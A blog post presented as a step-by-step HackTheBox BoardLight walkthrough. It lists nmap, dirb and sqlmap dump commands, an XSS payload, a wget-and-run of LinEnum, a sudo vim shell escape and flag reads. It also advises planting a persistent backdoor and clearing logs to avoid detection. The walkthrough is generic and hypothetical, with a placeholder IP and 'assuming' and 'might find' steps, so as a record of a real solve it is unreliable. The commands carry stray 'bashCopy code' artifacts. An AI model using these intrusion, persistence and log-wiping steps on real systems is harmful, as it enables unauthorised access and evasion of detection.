BoardLight Writeup Solve Step by Step
If you’ve ever dipped your toes into the world of ethical hacking, chances are you’ve heard of HackTheBox (HTB). It’s a platform that provides a variety of virtual machines (VMs) designed to challenge your hacking skills. Today, we’ll dive into a detailed walkthrough of the BoardLight Writeup VM on HTB. This writeup will guide you through each step, from initial recon to capturing the final flag, ensuring you grasp every concept along the way.
BoardLight Writeup
Setting Up the BoardLight Writeup Environment
Before diving into BoardLight, it’s essential to have your environment ready. Here’s what you need:
Necessary Tools
- Nmap: For network scanning
- Dirb: For directory brute-forcing
- Burp Suite: For web vulnerability analysis
- SQLmap: For automated SQL injection
- Metasploit: For exploitation
Network Configuration
Ensure your machine is properly configured to interact with HTB VMs. This usually involves:
- Connecting to the HTB VPN: You should have received a connection pack from HTB.
- Setting up your network interface: Typically done via a simple OpenVPN command.
Connecting to the VPN
Run the following command to connect to the HTB VPN:
bashCopy codesudo openvpn --config your-vpn-config.ovpn
Once connected, you should be able to ping the BoardLight machine and start your engagement.
Initial Reconnaissance
To start our attack, we need to gather as much information as possible about the target.
Running Nmap Scan
Begin with an Nmap scan to identify open ports and services:
bashCopy codenmap -sC -sV -oN nmap/initial_scan 10.10.10.XYZ
This command runs a default script scan and a version scan, saving the output for later analysis.
Analyzing Open Ports and Services
From our Nmap scan, we might find ports like 80 (HTTP) and 22 (SSH) open. Let’s focus on HTTP first, as web applications are often rich with vulnerabilities.
Enumeration
Exploring the Web Server
Open your browser and navigate to http://10.10.10.XYZ
. Here, we might find a web application running BoardLight.
Directory and File Brute-Forcing
Use Dirb to discover hidden directories and files:
bashCopy codedirb <http://10.10.10.XYZ>
This might reveal interesting directories like /admin
or /backup
.
Finding Hidden Directories
Analyze the output from Dirb. If we find directories like /admin
, they could be key entry points for further exploitation.
Identifying Vulnerabilities
Web Application Vulnerability Analysis
We now examine the application for common web vulnerabilities.
SQL Injection
Use SQLmap to test for SQL injection vulnerabilities:
bashCopy codesqlmap -u "<http://10.10.10.XYZ/admin/login.php>" --forms --dbs
SQLmap can automate the detection and exploitation of SQL injection vulnerabilities, listing available databases if successful.
Cross-Site Scripting (XSS)
Manually test input fields for XSS by injecting payloads like <script>alert('XSS')</script>
and observing the results.
Exploiting Vulnerabilities
Exploiting SQL Injection
Assuming SQL injection is found, use SQLmap to extract sensitive information:
bashCopy codesqlmap -u "<http://10.10.10.XYZ/admin/login.php>" --dump
This might yield admin credentials.
Exploiting XSS
If XSS is found, use it to steal cookies or execute malicious scripts, potentially gaining session tokens or administrative access.
Gaining Access to the System
With admin credentials or session tokens, access the admin panel and look for further exploits, like file uploads or command execution.
Privilege Escalation
Once on the system, our goal is to escalate privileges from a regular user to root.
Enumerating the System
Run enumeration scripts like LinEnum or manually check for misconfigurations:
bashCopy codewget <http://path/to/LinEnum.sh>
chmod +x LinEnum.sh
./LinEnum.sh
Kernel Exploits
Check the kernel version and search for public exploits. Use platforms like Exploit-DB to find applicable exploits.
Leveraging Sudo Permissions
If sudo
permissions are misconfigured, we can exploit them. Check sudoers file and run:
bashCopy codesudo -l
If a binary like vim
is allowed, escalate privileges through it:
bashCopy codesudo vim -c ':!sh'
Capturing the Flags
User Flag
Typically found in the user’s home directory:
bashCopy codecat /home/user/user.txt
Root Flag
Located in the root directory:
bashCopy codecat /root/root.txt
Post-Exploitation
Maintaining Access
To maintain access, consider adding your SSH key to the ~/.ssh/authorized_keys
file or setting up a persistent backdoor.
Cleaning Up
Ensure you clean up any changes to avoid detection:
- Remove added files
- Clear logs
Mitigation and Defense
Patching Vulnerabilities
Ensure all software is up-to-date. Regularly patch systems to fix known vulnerabilities.
Security Best Practices
- Use strong, unique passwords
- Implement multi-factor authentication
- Regularly audit system configurations and permissions
Conclusion
In this BoardLight HTB writeup, we walked through setting up the environment, performing initial reconnaissance, identifying and exploiting vulnerabilities, and finally capturing the flags. Each step highlights crucial skills and methodologies essential for ethical hacking. By practicing on platforms like HackTheBox, you can hone your skills and prepare for real-world scenarios.
Also Read : SolarLab HTB Writeup
Pingback: Mellitus Writeup | Mellitus walkthrough HacktheBox - hackerhq.tech